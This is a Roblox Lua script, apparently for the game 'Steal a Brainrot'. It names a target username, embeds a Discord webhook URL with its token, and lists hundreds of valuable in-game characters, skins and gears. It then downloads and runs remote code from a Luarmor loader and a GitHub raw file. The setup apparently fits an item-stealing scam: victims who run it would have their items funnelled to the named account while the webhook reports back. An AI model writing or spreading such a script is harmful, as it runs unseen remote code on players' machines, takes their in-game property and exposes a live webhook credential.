getgenv().TARGET_USER = "Drk_ss760"
getgenv().WEBHOOK_URL = "https://ptb.discord.com/api/webhooks/1524908186656571555/Nr4hcZsVyYCz4Q123zPCKFLszSQ7rWrTWHojciw7T11ZmfMsnI52edVSlq0d9iaqQDcv"
getgenv().NORMAL_BRAINROTS = {
    ["Garama and Madundung"] = true,
    ["Capitano Moby"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Tang Tang Keletang"] = true,
    ["Money Money Puggy"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Graipuss Medussi"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Agarrini la Palini"] = true,
    ["Fragola La La La"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["La Grande Combinasion"] = true,
    ["Los Trios"] = true,
    ["La Sahur Combinasion"] = true,
    ["Bacuru and Egguru"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Money Money Reindeer"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Bisonte Giuppitere"] = true,
    ["Jackorilla"] = true,
    ["Reindeer Tralala"] = true,
    ["Pumpkini Spyderini"] = true,
    ["Frankentteo"] = true,
    ["Santteo"] = true,
    ["Telemorte"] = true,
    ["Spaghetti Tualetti"] = true,
    ["La Secret Combinasion"] = true,
    ["La Food Combinasion"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Karkerkar Kurkur"] = true,
    ["La Ginger Sekolah"] = true,
    ["Rosey and Teddy"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Swaggy Bros"] = true,
    ["La Taco Combinasion"] = true,
    ["Chipso and Queso"] = true,
    ["La Spooky Grande"] = true,
    ["Tuff Toucan"] = true,
    ["Chillin Chili"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Strawberry Elephant"] = true,
    ["La Extinct Grande"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Perrito Burrito"] = true,
    ["La Vacca Saturno Saturnita"] = true,
    ["Karker Sahur"] = true,
    ["Bunito Bunito Spinito"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Bunnyman"] = true,
    ["Brunito Marsito"] = true,
    ["Guest 666"] = true,
    ["Mariachi Corazoni"] = true,
    ["Swag Soda"] = true,
    ["Extinct Matteo"] = true,
    ["Los Quesadillas"] = true,
    ["Spinny Hammy"] = true,
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Nacho Spyder"] = true,
    ["Griffin"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["La Romantic Grande"] = true,
    ["Festive 67"] = true,
    ["Los Tralaleritos"] = true,
    ["Las Tralaleritas"] = true,
    ["GOAT"] = true,
    ["Love Love Bear"] = true,
    ["Ginger Gerat"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Trenostruzzo Turbo 4000"] = true,
    ["La Karkerkar Combinasion"] = true,
    ["La Vacca Prese Presente"] = true,
    ["Rocco Disco"] = true,
    ["1x1x1x1"] = true,
    ["25"] = true,
    ["67"] = true,
    ["Abyssaloco"] = true,
    ["Antonio"] = true,
    ["Aquarino"] = true,
    ["Arcadopus"] = true,
    ["Arcadragon"] = true,
    ["Bananito"] = true,
    ["Baskito"] = true,
    ["Bearito Cabinito"] = true,
    ["Berryno"] = true,
    ["Blackhole Goat"] = true,
    ["Boatito Auratito"] = true,
    ["Bombardiro Vaccariro"] = true,
    ["Boppin Bunny"] = true,
    ["Buho de Volto"] = true,
    ["Bunny Bunny Bunny Sahur"] = true,
    ["Bunny and Eggy"] = true,
    ["Buntteo"] = true,
    ["Burrito Bandito"] = true,
    ["Camera Ramena"] = true,
    ["Capitano Gullini"] = true,
    ["Cash or Card"] = true,
    ["Caylusaurus"] = true,
    ["Celestial Pegasus"] = true,
    ["Chachechi"] = true,
    ["Chicleteira Bicicleteira"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Chicleteira Surfeiteira"] = true,
    ["Chicleteirina Bicicleteirina"] = true,
    ["Chill Puppy"] = true,
    ["Chimnino"] = true,
    ["Churrito Bunnito"] = true,
    ["Cigno Fulgoro"] = true,
    ["Cloverat Clapat"] = true,
    ["Coco and Mango"] = true,
    ["Craburger"] = true,
    ["Cuadramat and Pakrahmatmamat"] = true,
    ["Cupid Cupid Sahur"] = true,
    ["Cupid Hotspot"] = true,
    ["DJ Panda"] = true,
    ["Digi Narwhal"] = true,
    ["Donkeyturbo Express"] = true,
    ["Dragon Aquanini"] = true,
    ["Dug dug dug"] = true,
    ["Duggy Bros"] = true,
    ["Dul Dul Dul"] = true,
    ["Easter Easter Easter Sahur"] = true,
    ["Eid Eid Eid Sahur"] = true,
    ["Elefanto Frigo"] = true,
    ["Esok Sekolah"] = true,
    ["Extinct Tralalero"] = true,
    ["Fishboard"] = true,
    ["Fishino Clownino"] = true,
    ["Flancito"] = true,
    ["Flipa Sandala"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Foxini Lanternini"] = true,
    ["Frullato Framingo"] = true,
    ["Futbolini Skatini"] = true,
    ["Gelato Lumacho"] = true,
    ["Giftini Spyderini"] = true,
    ["Girafini Raftini"] = true,
    ["Glaciator"] = true,
    ["Globa Steppa"] = true,
    ["Gold Egg"] = true,
    ["Gold Elf"] = true,
    ["Gold Gold Gold"] = true,
    ["Granny"] = true,
    ["Guerriro Digitale"] = true,
    ["Gym Bros"] = true,
    ["Ho Ho Ho Sahur"] = true,
    ["Hopilikalika Hopilikalako"] = true,
    ["Horegini Boom"] = true,
    ["Hydra Bunny"] = true,
    ["Jelly Moby"] = true,
    ["Job Job Job Sahur"] = true,
    ["John Doe"] = true,
    ["Kalika Bros"] = true,
    ["Kraken"] = true,
    ["La Anniversary Grande"] = true,
    ["La Cucaracha"] = true,
    ["La Easter Grande"] = true,
    ["La Lucky Grande"] = true,
    ["La Summer Grande"] = true,
    ["La Vacca Jacko Linterino"] = true,
    ["La Vacca Lepre Lepreino"] = true,
    ["Las Sis"] = true,
    ["Las Vaquitas Saturnitas"] = true,
    ["List List List Sahur"] = true,
    ["Los 25"] = true,
    ["Los 67"] = true,
    ["Los Amigos"] = true,
    ["Los Bunitos"] = true,
    ["Los Burritos"] = true,
    ["Los Candies"] = true,
    ["Los Chicleteiras"] = true,
    ["Los Chillis"] = true,
    ["Los Combinasionas"] = true,
    ["Los Cucarachas"] = true,
    ["Los Cupids"] = true,
    ["Los Fruits"] = true,
    ["Los Hackers"] = true,
    ["Los Jobcitos"] = true,
    ["Los Karkeritos"] = true,
    ["Los Mariachis"] = true,
    ["Los Matteos"] = true,
    ["Los Mi Gatitos"] = true,
    ["Los Mobilis"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["Los Planitos"] = true,
    ["Los Spyderinis"] = true,
    ["Los Sweethearts"] = true,
    ["Los Tortus"] = true,
    ["Love Love Love Sahur"] = true,
    ["Lovin Rose"] = true,
    ["Luck Luck Luck Sahur"] = true,
    ["Lucky Block"] = true,
    ["Mi Gatito"] = true,
    ["Money Money Bros"] = true,
    ["Naughty Naughty"] = true,
    ["Noo my Candy"] = true,
    ["Noo my Eggs"] = true,
    ["Noo my Gold"] = true,
    ["Noo my Heart"] = true,
    ["Noo my Present"] = true,
    ["Noo my examine"] = true,
    ["Nooo My Hotspot"] = true,
    ["Octoball"] = true,
    ["Ombrello Topolino"] = true,
    ["Pancake and Syrup"] = true,
    ["Paradiso Axolottino"] = true,
    ["Please my Present"] = true,
    ["Pot Hotspot"] = true,
    ["Pot Pumpkin"] = true,
    ["Quackini Snackini"] = true,
    ["Quesadilla Crocodila"] = true,
    ["Rang Ring Bus"] = true,
    ["Rico Dinero"] = true,
    ["Rocketini Frostini"] = true,
    ["Rosetti Tualetti"] = true,
    ["Rubrikiko"] = true,
    ["Sammyni Cakini"] = true,
    ["Sammyni Fattini"] = true,
    ["Sammyni Spyderini"] = true,
    ["Sand Sand Sand"] = true,
    ["Santa Hotspot"] = true,
    ["Serafinna Medusella"] = true,
    ["Signore Carapace"] = true,
    ["Snailo Clovero"] = true,
    ["Steakini Fattini"] = true,
    ["Strawberrita"] = true,
    ["Sushi Inu"] = true,
    ["Tacorillo Crocodillo"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["To To To Sahur"] = true,
    ["Torrtuginni Dragonfrutini"] = true,
    ["Trickolino"] = true,
    ["Triplito Tralaleritos"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Venuspino"] = true,
    ["Vulturino Skeletono"] = true,
    ["Yess my examine"] = true,
    ["Zombie Tralala"] = true,
    ["Esok Goala"] = true,
    ["Ref Ref Ref Sahur"] = true,
    ["Hippo Golazo"] = true,
    ["Bufalino Boomberino"] = true,
    ["Capitano Americano"] = true,
    ["Var Var Var"] = true
}
getgenv().NORMAL_BASE_SKINS = {
    ["Rose"] = true,
    ["Gingerbread"] = true,
    ["Halloween"] = true,
    ["Christmas"] = true,
    ["Bunny Basket"] = true,
    ["Summer"] = true,
    ["Pot of Gold"] = true,
    ["Taco"] = true,
    ["Octo"] = true,
    ["Valentines"] = true,
    ["Easter"] = true,
    ["Lucky"] = true,
    ["Aquatic"] = true
}
getgenv().NORMAL_GEARS = {
    ["Santa's Sleigh"] = true,
    ["Cupid's Wings"] = true,
    ["Witch's Broom"] = true,
    ["Waverider"] = true,
    ["Yin Yang Slap"] = true,
    ["Cursed Slap"] = true,
    ["Cyber Slap"] = true,
    ["Divine Slap"] = true,
    ["Bloodmoon Slap"] = true,
    ["Radioactive Slap"] = true,
    ["Rainbow Slap"] = true,
    ["Rainbow Hammer"] = true,
    ["Bloodmoon Hammer"] = true,
    ["Radioactive Airstrike"] = true,
    ["Yin Yang Lamp"] = true,
    ["Demon's Head"] = true,
    ["Lava Slap"] = true,
    ["Lava Blaster"] = true,
    ["Alien Slap"] = true,
    ["Blackhole Bomb"] = true,
    ["Candy Sentry"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/c5a067c93477b930cc4602547c6d5ffe.lua",true))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/UNC-scripter/larp-duel/refs/heads/main/.lua"))()
end)
